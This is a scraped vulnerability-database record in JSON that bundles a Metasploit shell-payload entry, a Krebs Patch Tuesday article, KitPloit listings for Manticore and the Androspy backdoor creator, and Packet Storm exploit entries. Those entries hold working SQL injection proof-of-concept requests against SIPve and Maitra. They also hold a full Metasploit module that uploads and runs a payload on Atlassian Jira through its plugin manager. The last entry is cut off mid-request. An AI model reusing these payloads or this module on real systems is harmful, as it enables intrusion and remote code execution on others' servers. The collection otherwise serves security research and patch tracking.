ID MSF:PAYLOAD/LINUX/PPC/SHELL_FIND_PORT
Type metasploit
Reporter Rapid7
Modified 1976-01-01T00:00:00
Description
Spawn a shell on an established connection
{"id": "MSF:PAYLOAD/LINUX/PPC/SHELL_FIND_PORT", "hash": "d2c2feaa7c9f9ffba7f937afdf771bfe", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Command Shell, Find Port Inline", "description": "Spawn a shell on an established connection", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-08-21T15:32:21", "history": [{"edition": 1, "bulletin": {"published": "1976-01-01T00:00:00", "type": "metasploit", "bulletinFamily": "exploit", "reporter": "Rapid7", "title": "Linux Command Shell, Find Port Inline", "references": [], "modified": "1976-01-01T00:00:00", "description": "Spawn a shell on an established connection", "enchantments": {}, "viewCount": 6, "lastseen": "2017-07-02T23:53:22", "id": "MSF:PAYLOAD/LINUX/PPC/SHELL_FIND_PORT", "sourceHref": "", "cvelist": [], "objectVersion": "1.4", "history": [], "metasploitReliability": "Normal", "href": "https://www.rapid7.com/db/modules/payload/linux/ppc/shell_find_port", "cvss": {"score": 0.0, "vector": "NONE"}, "metasploitHistory": "", "sourceData": ""}, "differentElements": ["href"], "lastseen": "2017-07-02T23:53:22"}], "viewCount": 12, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "", "sourceData": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"]}
{"krebs": [{"lastseen": "2018-11-14T14:42:50", "_object_types": ["robots.models.base.Bulletin", "robots.models.rss.RssBulletin"], "references": [], "description": "**Microsoft** on Tuesday released 16 software updates to fix more than 60 security holes in various flavors of **Windows** and other Microsoft products. **Adobe** also has security patches available for **Flash Player**, **Acrobat** and **Reader** users.\n\nAs per usual, most of the critical flaws -- those that can be exploited by malware or miscreants without any help from users -- reside in Microsoft's Web browsers **Edge** and **Internet Explorer**.\n\nThis week's patch batch addresses two flaws of particular urgency: One is a zero-day vulnerability ([CVE-2018-8589](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8589>)) that is already being exploited to compromise **Windows 7** and **Server 2008** systems.\n\nThe other is a publicly disclosed bug in Microsoft's **Bitlocker** encryption technology ([CVE-2018-8566](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8566>)) that could allow an attacker to get access to encrypted data. One mitigating factor with both security holes is that the attacker would need to be already logged in to the targeted system to exploit them.\n\nOf course, if the target has Adobe Reader or Acrobat installed, it might be easier for attackers to achieve that log in. According to [analysis](<https://blog.qualys.com/laws-of-vulnerabilities/2018/11/13/november-2018-patch-tuesday-62-vulns-tftp-server-rce-adobe-poc>) from security vendor **Qualys**, there is now code publicly available that could force these two products to leak a hash of the user's Windows password (which could then be cracked with open-source tools). A [new update](<https://helpx.adobe.com/security/products/acrobat/apsb18-40.html>) for Acrobat/Reader fixes this bug, and Adobe has published some [mitigation suggestions](<https://helpx.adobe.com/acrobat/kb/mitigation-NTLM-dictionary-attacks.html>) as well.\n\nIn addition, Adobe pushed out [a security update](<https://helpx.adobe.com/security/products/flash-player/apsb18-39.html>) for Windows, Mac, Linux and Chrome versions of **Flash Player**. The update fixes just one vulnerability in Flash, but I'm sure most of us would rather Flash died off completely already. Adobe said it plans to end support for the plugin in 2020. **Google Chrome** is now making users explicitly enable Flash every time they want to use it, and by the summer of 2019 it will [make users go into their settings to enable it](<https://nakedsecurity.sophos.com/2018/09/03/chrome-flash-is-almost-almost-almost-dead/>) every time they want to run it.\n\nKrebsOnSecurity has frequently suggested that Windows users wait a day or two after Microsoft releases monthly security updates before installing the fixes, with the rationale that occasionally buggy patches can cause serious headaches for users who install them before all the kinks are worked out.\n\n**Windows 10** likes to install patches all in one go and reboot your computer on its own schedule. Microsoft doesn\u2019t make it easy for Windows 10 users to change this setting, [but it is possible](<https://www.howtogeek.com/224471/how-to-prevent-windows-10-from-automatically-downloading-updates/>). For all other Windows OS users, if you\u2019d rather be alerted to new updates when they\u2019re available so you can choose when to install them, there\u2019s a setting for that in **Windows Update**.\n\nIn either case, it's a good idea to get in the habit of backing up your data before installing Windows updates. Unlike last month, when many Windows users saw the contents of their \"My Documents\" folder erased by a buggy update, I'm not aware of any major issues this time around.\n\nIf you experience any problems installing any of these patches this month, please feel free to leave a comment about it below; there\u2019s a good chance other readers have experienced the same and may even chime in here with some helpful tips.", "reporter": "BrianKrebs", "published": "2018-11-14T13:25:13", "type": "krebs", "title": "Patch Tuesday, November 2018 Edition", "enchantments": {"score": {"modified": "2018-11-14T14:42:50", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "blog", "cvelist": ["CVE-2018-8566", "CVE-2018-8589"], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-11-14T13:25:13", "id": "KREBS:6172D354376A559F0FD7E586CF25234F", "href": "https://krebsonsecurity.com/2018/11/patch-tuesday-november-2018-edition/", "cvss": {"score": 0.0, "vector": "NONE"}}], "kitploit": [{"lastseen": "2018-11-14T15:49:35", "references": ["https://github.com/trailofbits/manticore-examples", "https://github.com/trailofbits/manticore/wiki", "https://github.com/trailofbits/manticore/blob/master/examples", "https://github.com/ethereum/solidity", "https://github.com/trailofbits/manticore/wiki/Hacking-on-Manticore", "https://github.com/trailofbits/manticore"], "description": "[  ](<https://1.bp.blogspot.com/-7VHqcv--QCA/W-CF-x-mJBI/AAAAAAAANHU/pxM9sa96bhY5NN0a4ukeb4u3pi8j3rWOQCLcBGAs/s1600/manticore_1_manticore.png>)\n\n \nManticore is a symbolic execution tool for analysis of binaries and smart contracts. \n\n\n> Note: Beginning with version 0.2.0, Python 3.6+ is required. \n\n \n** Features ** \n\n\n * ** Input Generation ** : Manticore automatically generates inputs that trigger unique code paths \n * ** Crash Discovery ** : Manticore discovers inputs that crash programs via memory safety violations \n * ** Execution Tracing ** : Manticore records an instruction-level trace of execution for each generated input \n * ** Programmatic Interface ** : Manticore exposes programmatic access to its analysis engine via a Python API \nManticore can analyze the following types of programs: \n\n\n * Ethereum smart contracts (EVM bytecode) \n * Linux ELF binaries (x86, x86_64 and ARMv7) \n \n** Usage ** \n \n** CLI ** \nManticore has a [ command line ](<https://www.kitploit.com/search/label/Command%20Line>) interface which can be used to easily symbolically execute a supported program or smart contract. [ Analysis ](<https://www.kitploit.com/search/label/Analysis>) results will be placed into a new directory beginning with ` mcore_ ` . \nUse the CLI to explore possible states in [ Ethereum ](<https://www.kitploit.com/search/label/Ethereum>) smart contracts. Manticore includes _ detectors _ that flag potentially [ vulnerable ](<https://www.kitploit.com/search/label/Vulnerable>) code in discovered states. Solidity smart contracts must have a ` .sol ` extension for analysis by Manticore. See a [ demo ](<https://asciinema.org/a/154012>) . \n\n \n \n $ manticore ./path/to/contract.sol # runs, and creates a mcore_* directory with analysis results\n $ manticore --detect-reentrancy ./path/to/contract.sol # Above, but with reentrancy detection enabled\n $ manticore --detect-all ./path/to/contract.sol # Above, but with all detectors enabled\n\nThe command line can also be used to simply explore a Linux binary: \n\n \n \n $ manticore ./path/to/binary # runs, and creates a mcore_* directory with analysis results\n $ manticore ./path/to/binary ab cd # use concrete strings \"ab\", \"cd\" as program arguments\n $ manticore ./path/to/binary ++ ++ # use two symbolic strings of length two as program arguments\n\n \n** API ** \nManticore has a Python programming interface which can be used to implement custom analyses. \nFor Ethereum smart contracts, it can be used for detailed verification of arbitrary contract properties. Set starting conditions, execute symbolic transactions, then review discovered states to ensure invariants for your contract hold. \n\n \n \n from manticore.ethereum import ManticoreEVM\n contract_src=\"\"\"\n contract Adder {\n function incremented(uint value) public returns (uint){\n if (value == 1)\n revert();\n return value + 1;\n }\n }\n \"\"\"\n m = ManticoreEVM()\n \n user_account = m.create_account(balance=1000)\n contract_account = m.solidity_create_contract(contract_src,\n owner=user_account,\n balance=0)\n value = m.make_symbolic_value()\n \n contract_account.incremented(value)\n \n for state in m.running_states:\n print(\"can value be 1? {}\".format(state.can_be_true(value == 1)))\n print(\"can value be 200? {}\".format(state.can_be_true(value == 200)))\n\nIt is also possible to use the API to create custom analysis tools for Linux binaries. \n\n \n \n # example Manticore script\n from manticore import Manticore\n \n hook_pc = 0x400ca0\n \n m = Manticore('./path/to/binary')\n \n @m.hook(hook_pc)\n def hook(state):\n cpu = state.cpu\n print('eax', cpu.EAX)\n print(cpu.read_int(cpu.ESP))\n \n m.terminate() # tell Manticore to stop\n \n m.run()\n\n \n** Requirements ** \n\n\n * Manticore is supported on Linux and requires ** Python 3.6+ ** . \n * Ubuntu 18.04 is strongly recommended. \n * Ethereum smart contract analysis requires the [ ` solc ` ](<https://github.com/ethereum/solidity>) program in your ` $PATH ` . \n \n** Quickstart ** \nInstall and try Manticore in a few shell commands: \n\n \n \n # Install system dependencies\n sudo apt-get update && sudo apt-get install python3 python3-pip -y\n \n # Install Manticore and its dependencies\n sudo pip3 install manticore\n \n # Download the examples\n git clone https://github.com/trailofbits/manticore.git && cd manticore/examples/linux\n \n # Build the examples\n make\n \n # Use the Manticore CLI\n manticore basic\n cat mcore_*/*0.stdin | ./basic\n cat mcore_*/*1.stdin | ./basic\n \n # Use the Manticore API\n cd ../script\n python3 count_instructions.py ../linux/helloworld\n\nYou can also use Docker to quickly install and try Manticore: \n\n \n \n # Download the Manticore image\n docker pull trailofbits/manticore\n \n # Download the examples\n git clone https://github.com/trailofbits/manticore.git && cd manticore\n \n # Run container with a shared examples/ directory\n docker run -it -v $PWD/examples:/home/manticore/examples trailofbits/manticore\n \n # Change to examples directory\n [email\u00a0protected]$ cd examples/linux\n \n # Build the examples\n [email\u00a0protected]$ make\n \n # Use the Manticore CLI\n [email\u00a0protected]$ manticore basic\n [email\u00a0protected]$ cat mcore_*/*0.stdin | ./basic\n [email\u00a0protected]$ cat mcore_*/*1.stdin | ./basic\n \n # Use the Manticore API\n [email\u00a0protected]$ cd ../script\n [email\u00a0protected]$ python3 count_instructions.py ../linux/helloworld\n\n \n** Installation ** \nOption 1: Perform a user install (requires ` ~/.local/bin ` in your ` PATH ` ). \n\n \n \n echo \"PATH=\\$PATH:~/.local/bin\" >> ~/.profile\n source ~/.profile\n pip3 install --user manticore\n\nOption 2: Use a virtual environment (requires [ virtualenvwrapper ](<https://virtualenvwrapper.readthedocs.io/en/latest/>) or [ similar ](<https://virtualenv.pypa.io/en/stable/>) ). \n\n \n \n sudo pip3 install virtualenvwrapper\n echo \"source /usr/local/bin/virtualenvwrapper.sh\" >> ~/.profile\n source ~/.profile\n mkvirtualenv manticore\n sudo ./manticore/bin/pip3 install manticore\n\nOption 3: Perform a system install. \n\n \n \n sudo pip3 install manticore\n\nOption 4: Install via Docker. \n\n \n \n docker pull trailofbits/manticore\n\nOnce installed, the ` manticore ` CLI tool and Python API will be available. \nFor installing a development version of Manticore, see our [ wiki ](<https://github.com/trailofbits/manticore/wiki/Hacking-on-Manticore>) . \n \n** Getting Help ** \nFeel free to stop by our [ Slack channel ](<https://empirehacking.slack.com/messages/C3PTWK7UM>) for help on using or extending Manticore. \nDocumentation is available in several places: \n\n\n * The [ wiki ](<https://github.com/trailofbits/manticore/wiki>) contains some basic information about getting started with Manticore and contributing \n\n * The [ examples ](<https://github.com/trailofbits/manticore/blob/master/examples>) directory has some very minimal examples that showcase API features \n\n * The [ API reference ](<https://manticore.readthedocs.io/en/latest/>) has more thorough and in-depth documentation on our API \n\n * The [ manticore-examples ](<https://github.com/trailofbits/manticore-examples>) repository has some more involved examples, for instance solving real CTF problems \n \n\n\n** [ Download Manticore ](<https://github.com/trailofbits/manticore>) **\n", "edition": 1, "reporter": "KitPloit", "published": "2018-11-14T12:46:03", "title": "Manticore - Symbolic Execution Tool For Analysis Of Binaries And Smart Contracts", "type": "kitploit", "enchantments": {"score": {"modified": "2018-11-14T15:49:35", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "tools", "cvelist": [], "modified": "2018-11-14T12:46:03", "toolHref": "https://github.com/trailofbits/manticore", "id": "KITPLOIT:5960683155408110323", "href": "http://www.kitploit.com/2018/11/manticore-symbolic-execution-tool-for.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-11-14T01:50:35", "references": ["https://github.com/TunisianEagles/Androspy", "https://tunisianeagles.github.io/"], "description": "[  ](<https://3.bp.blogspot.com/-0yQFg_TDAjo/W-SK1w4sZRI/AAAAAAAANKA/fFbj39DssHgplc3GApu2vHTxsd9dHaRNgCLcBGAs/s1600/Androspy_2.png>)\n\n \n\n\nAndrospy : is [ Backdoor ](<https://www.kitploit.com/search/label/Backdoor>) Crypter & Creator with Automatic IP Poisener Coded By Belahsan Ouerghi \n\n \n** Dependencies ** \n\n\n * keytool \n * jarsigner \n * Apache2 \n * Metasploit-Framework \n * xterm \n \n** Installation ** \n\n \n \n sudo apt-get install git\n git clone https://github.com/TunisianEagles/Androspy.git\n cd Androspy\n chmod +x setup.sh\n sudo ./setup.sh\n chmod +x androspy.sh\n sudo ./androspy.sh\n\n \n** Tested on : ** \n\n\n * BackBox Linux \n * Kali linux \n * Parrot os \n \n** Contact ** \n\n\n * [ Contact ](<https://facebook.com/tunisianeagles/>) \\- Tunisian Eagles \n * [Email] - [email protected] \\- TunisianEagles \n * [ Website ](<https://tunisianeagles.github.io/>) \\- TunisianEagles \n \n\n\n** [ Download Androspy ](<https://github.com/TunisianEagles/Androspy>) **\n", "edition": 1, "reporter": "KitPloit", "published": "2018-11-13T21:16:00", "title": "Androspy - Backdoor Crypter & Creator With Automatic IP Poisener", "type": "kitploit", "enchantments": {"score": {"modified": "2018-11-14T01:50:35", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "tools", "cvelist": [], "modified": "2018-11-13T21:16:00", "toolHref": "https://github.com/TunisianEagles/Androspy", "id": "KITPLOIT:3354586933119831761", "href": "http://www.kitploit.com/2018/11/androspy-backdoor-crypter-creator-with.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2018-11-14T10:23:07", "references": [], "description": "", "edition": 1, "reporter": "Ihsan Sencan", "published": "2018-11-14T00:00:00", "title": "SIPve 0.0.2-R19 SQL Injection", "type": "packetstorm", "enchantments": {"score": {"modified": "2018-11-14T10:23:07", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-11-14T00:00:00", "id": "PACKETSTORM:150324", "href": "https://packetstormsecurity.com/files/150324/SIPve-0.0.2-R19-SQL-Injection.html", "sourceData": "`# Exploit Title: SIPve 0.0.2-R19 - SQL Injection \n# Dork: N/A \n# Date: 2018-11-11 \n# Exploit Author: Ihsan Sencan \n# Vendor Homepage: https://sourceforge.net/projects/sipve/ \n# Software Link: https://datapacket.dl.sourceforge.net/project/sipve/sipve-v0.0.2-R19.tar.gz \n# Version: 0.0.2-R19 \n# Category: Webapps \n# Tested on: WiN7_x64/KaLiLinuX_x64 \n# CVE: N/A \n \n# POC: \n# 1) \n# http://localhost/[PATH]/monitorasoc/view/monitorasocAcc.php?usuario=[SQL]&accion=asociar \n# \nGET /[PATH]/monitorasoc/view/monitorasocAcc.php?usuario=%31%27%20%41%4e%44%20%28%53%45%4c%45%43%54%20%2a%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%28%53%4c%45%45%50%28%35%29%29%29%45%66%65%29%2d%2d%20%45%66%65&accion=asociar HTTP/1.1 \nHost: TARGET \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nCookie: PHPSESSID=p5kifla1c6ge33dkui0eijm2e2 \nConnection: keep-alive \nHTTP/1.1 200 OK \nDate: Sun, 11 Nov 2018 18:56:49 GMT \nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 \nX-Powered-By: PHP/5.6.30 \nExpires: Sat, 26 Jul 1997 05:00:00 GMT \nCache-Control: no-cache, must-revalidate \nPragma: no-cache \nKeep-Alive: timeout=5, max=94 \nConnection: Keep-Alive \nTransfer-Encoding: chunked \nContent-Type: text/html; charset=UTF-8 \n \n# POC: \n# 2) \n# http://localhost/[PATH]/grupo/view/getGrupoFuncionLoaded.php?idgrupo=[SQL]&accion=1 \n# \nGET /[PATH]/grupo/view/getGrupoFuncionLoaded.php?idgrupo=%31%27%29%20%52%4c%49%4b%45%20%28%53%45%4c%45%43%54%20%28%43%41%53%45%20%57%48%45%4e%20%28%36%36%3d%36%36%29%20%54%48%45%4e%20%31%20%45%4c%53%45%20%30%78%32%38%20%45%4e%44%29%29%2d%2d%20%45%66%65&accion=1 HTTP/1.1 \nHost: TARGET \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nCookie: PHPSESSID=p5kifla1c6ge33dkui0eijm2e2 \nConnection: keep-alive \nHTTP/1.1 200 OK \nDate: Sun, 11 Nov 2018 18:58:53 GMT \nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 \nX-Powered-By: PHP/5.6.30 \nCache-Control: no-cache, must-revalidate \nExpires: Sat, 26 Jul 1997 05:00:00 GMT \nKeep-Alive: timeout=5, max=91 \nConnection: Keep-Alive \nTransfer-Encoding: chunked \nContent-Type: text/html; charset=UTF-8 \n \n# POC: \n# 3) \n# http://localhost/[PATH]/monitorremoto/view/setStatusEvento.php?idevento=[SQL] \n# \nGET /[PATH]/monitorremoto/view/setStatusEvento.php?idevento=%2d%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2d%2d%20%2d HTTP/1.1 \nHost: TARGET \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nCookie: PHPSESSID=p5kifla1c6ge33dkui0eijm2e2 \nConnection: keep-alive \nHTTP/1.1 200 OK \nDate: Sun, 11 Nov 2018 19:01:04 GMT \nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 \nX-Powered-By: PHP/5.6.30 \nExpires: Thu, 19 Nov 1981 08:52:00 GMT \nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 \nPragma: no-cache \nKeep-Alive: timeout=5, max=100 \nConnection: Keep-Alive \nTransfer-Encoding: chunked \nContent-Type: text/html; charset=UTF-8 \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/150324/sipve002r19-sql.txt"}, {"lastseen": "2018-11-14T10:23:07", "references": [], "description": "", "edition": 1, "reporter": "Alexander Gonzalez", "published": "2018-11-14T00:00:00", "title": "Atlassian Jira Authenticated Upload Code Execution", "type": "packetstorm", "enchantments": {"score": {"modified": "2018-11-14T10:23:07", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-11-14T00:00:00", "id": "PACKETSTORM:150335", "href": "https://packetstormsecurity.com/files/150335/Atlassian-Jira-Authenticated-Upload-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Atlassian Jira Authenticated Upload Code Execution', \n'Description' => %q{ \nThis module can be used to execute a payload on Atlassian Jira via \nthe Universal Plugin Manager(UPM). The module requires valid login \ncredentials to an account that has access to the plugin manager. \nThe payload is uploaded as a JAR archive containing a servlet using \na POST request against the UPM component. The check command will \ntest the validity of user supplied credentials and test for access \nto the plugin manager. \n}, \n'Author' => 'Alexander Gonzalez(dubfr33)', \n'License' => MSF_LICENSE, \n'References' => \n[ \n['URL', 'https://developer.atlassian.com/server/framework/atlassian-sdk/install-the-atlassian-sdk-on-a-windows-system/'], \n['URL', 'https://developer.atlassian.com/server/framework/atlassian-sdk/install-the-atlassian-sdk-on-a-linux-or-mac-system/'], \n['URL', 'https://developer.atlassian.com/server/framework/atlassian-sdk/create-a-helloworld-plugin-project/'] \n], \n'Platform' => %w[java], \n'Targets' => \n[ \n['Java Universal', \n{ \n'Arch' => ARCH_JAVA, \n'Platform' => 'java' \n} \n] \n], \n'DisclosureDate' => 'Feb 22 2018')) \n \nregister_options( \n[ \nOpt::RPORT(2990), \nOptString.new('HttpUsername', [true, 'The username to authenticate as', 'admin']), \nOptString.new('HttpPassword', [true, 'The password for the specified username', 'admin']), \nOptString.new('TARGETURI', [true, 'The base URI to Jira', '/jira/']) \n]) \nend \n \ndef check \nlogin_res = query_login \nif login_res.nil? \nvprint_error('Unable to access the web application!') \nreturn CheckCode::Unknown \nend \nreturn CheckCode::Unknown unless login_res.code == 200 \n@session_id = get_sid(login_res) \n@xsrf_token = login_res.get_html_document.at('meta[@id=\"atlassian-token\"]')['content'] \nauth_res = do_auth \ngood_sid = get_sid(auth_res) \ngood_cookie = \"atlassian.xsrf.token=#{@xsrf_token}; #{good_sid}\" \nres = query_upm(good_cookie) \nif res.nil? \nvprint_error('Unable to access the web application!') \nreturn CheckCode::Unknown \nelsif res.code == 200 \nreturn Exploit::CheckCode::Appears \nelse \nvprint_status('Something went wrong, make sure host is up and options are correct!') \nvprint_status(\"HTTP Response Code: #{res.code}\") \nreturn Exploit::CheckCode::Unknown \nend \nend \n \ndef exploit \nunless access_login? \nfail_with(Failure::Unknown, 'Unable to access the web application!') \nend \nprint_status('Retrieving Session ID and XSRF token...') \nauth_res = do_auth \ngood_sid = get_sid(auth_res) \ngood_cookie = \"atlassian.xsrf.token=#{@xsrf_token}; #{good_sid}\" \nres = query_for_upm_token(good_cookie) \nif res.nil? \nfail_with(Failure::Unknown, 'Unable to retrieve UPM token!') \nend \nupm_token = res.headers['upm-token'] \nupload_exec(upm_token, good_cookie) \nend \n \n# Upload, execute, and remove servlet \ndef upload_exec(upm_token, good_cookie) \ncontents = '' \nname = Rex::Text.rand_text_alpha(8..12) \n \natlassian_plugin_xml = %Q{ \n<atlassian-plugin name=\"#{name}\" key=\"#{name}\" plugins-version=\"2\"> \n<plugin-info> \n<description></description> \n<version>1.0</version> \n<vendor name=\"\" url=\"\" /> \n \n<param name=\"post.install.url\">/plugins/servlet/metasploit/PayloadServlet</param> \n<param name=\"post.upgrade.url\">/plugins/servlet/metasploit/PayloadServlet</param> \n \n</plugin-info> \n \n<servlet name=\"#{name}\" key=\"metasploit.PayloadServlet\" class=\"metasploit.PayloadServlet\"> \n<description>\"#{name}\"</description> \n<url-pattern>/metasploit/PayloadServlet</url-pattern> \n</servlet> \n \n</atlassian-plugin> \n} \n \n# Generates .jar file for upload \nzip = payload.encoded_jar \nzip.add_file('atlassian-plugin.xml', atlassian_plugin_xml) \n \nservlet = MetasploitPayloads.read('java', '/metasploit', 'PayloadServlet.class') \nzip.add_file('/metasploit/PayloadServlet.class', servlet) \n \ncontents = zip.pack \n \nboundary = rand_text_numeric(27) \n \ndata = \"--#{boundary}\\r\\nContent-Disposition: form-data; name=\\\"plugin\\\"; \" \ndata << \"filename=\\\"#{name}.jar\\\"\\r\\nContent-Type: application/x-java-archive\\r\\n\\r\\n\" \ndata << contents \ndata << \"\\r\\n--#{boundary}--\" \n \nprint_status(\"Attempting to upload #{name}\") \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'rest/plugins/1.0/'), \n'vars_get' => \n{ \n'token' => \"#{upm_token}\" \n}, \n'method' => 'POST', \n'data' => data, \n'headers' => \n{ \n'Content-Type' => 'multipart/form-data; boundary=' + boundary, \n'Cookie' => good_cookie.to_s \n} \n}, 25) \n \nunless res && res.code == 202 \nprint_status(\"Error uploading #{name}\") \nprint_status(\"HTTP Response Code: #{res.code}\") \nprint_status(\"Server Response: #{res.body}\") \nreturn \nend \n \nprint_status(\"Successfully uploaded #{name}\") \nprint_status(\"Executing #{name}\") \nRex::ThreadSafe.sleep(3) \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path.to_s, 'plugins/servlet/metasploit/PayloadServlet'), \n'method' => 'GET', \n'cookie' => good_cookie.to_s \n}) \n \nprint_status(\"Deleting #{name}\") \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path.to_s, \"rest/plugins/1.0/#{name}-key\"), \n'method' => 'DELETE', \n'cookie' => good_cookie.to_s \n}) \nend \n \ndef access_login? \nres = query_login \nif res.nil? \nfail_with(Failure::Unknown, 'Unable to access the web application!') \nend \nreturn false unless res && res.code == 200 \n@session_id = get_sid(res) \n@xsrf_token = res.get_html_document.at('meta[@id=\"atlassian-token\"]')['content'] \nreturn true \nend \n \n# Sends GET request to login page so the HTTP response can be used \ndef query_login \nsend_request_cgi('uri' => normalize_uri(target_uri.path.to_s, 'login.jsp')) \nend \n \n# Queries plugin manager to verify access \ndef query_upm(good_cookie) \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path.to_s, 'plugins/servlet/upm'), \n'method' => 'GET', \n'cookie' => good_cookie.to_s \n}) \nend \n \n# Queries API for response containing upm_token \ndef query_for_upm_token(good_cookie) \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path.to_s, 'rest/plugins/1.0/'), \n'method' => 'GET', \n'cookie' => good_cookie.to_s \n}) \nend \n \n# Authenticates to webapp with user supplied credentials \ndef do_auth \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path.to_s, 'login.jsp'), \n'method' => 'POST', \n'cookie' => \"atlassian.xsrf.token=#{@xsrf_token}; #{@session_id}\", \n'vars_post' => { \n'os_username' => datastore['HttpUsername'], \n'os_password' => datastore['HttpPassword'], \n'os_destination' => '', \n'user_role' => '', \n'atl_token' => '', \n'login' => 'Log+In' \n} \n}) \nend \n \n# Finds SID from HTTP response headers \ndef get_sid(res) \nif res.nil? \nreturn '' if res.blank? \nend \nres.get_cookies.scan(/(JSESSIONID=\\w+);*/).flatten[0] || '' \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/150335/jira_plugin_upload.rb.txt"}, {"lastseen": "2018-11-14T10:23:07", "references": [], "description": "", "edition": 1, "reporter": "Ihsan Sencan", "published": "2018-11-14T00:00:00", "title": "Maitra Mail Tracking System 1.7.2 SQL Injection / Database File Download", "type": "packetstorm", "enchantments": {"score": {"modified": "2018-11-14T10:23:07", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-11-14T00:00:00", "id": "PACKETSTORM:150327", "href": "https://packetstormsecurity.com/files/150327/Maitra-Mail-Tracking-System-1.7.2-SQL-Injection-Database-File-Download.html", "sourceData": "`# Exploit Title: Maitra - Mail Tracking System 1.7.2 - SQL Injection / Database File Download \n# Dork: N/A \n# Date: 2018-11-11 \n# Exploit Author: Ihsan Sencan \n# Vendor Homepage: http://salzertechnologies.com/ \n# Software Link: https://netcologne.dl.sourceforge.net/project/maitra/maitra/maitra-desktop-v1.7.2.zip \n# Version: 1.7.2 \n# Category: Webapps \n# Tested on: WiN7_x64/KaLiLinuX_x64 \n# CVE: N/A \n \n# Server : Mongoose web server v.5.6 [FREE EDITION] \n# Default listening_port: 8080,8081,8082 \n \n# POC: \n# 1) \n# http://localhost/[PATH]/application/db/maitra.sqlite \n# \nGET /[PATH]/application/db/maitra.sqlite HTTP/1.1 \nHost: TARGET:8080 \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nConnection: keep-alive \nHTTP/1.1 200 OK \nDate: Sun, 11 Nov 2018 11:04:24 GMT \nLast-Modified: Sun, 11 Nov 2018 10:46:47 GMT \nEtag: \"5be80897.1114112\" \nContent-Type: text/plain \nContent-Length: 1114112 \nConnection: keep-alive \nAccept-Ranges: bytes \n \n# POC: \n# 2) \n# http://localhost/[PATH]/?c=outmail&m=outmailentry&mailid=[SQL] \n# \nGET /[PATH]/?c=outmail&m=outmailentry&mailid=-1)%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2csqlite_version()%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2d%2d HTTP/1.1 \nHost: TARGET:8080 \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nCookie: 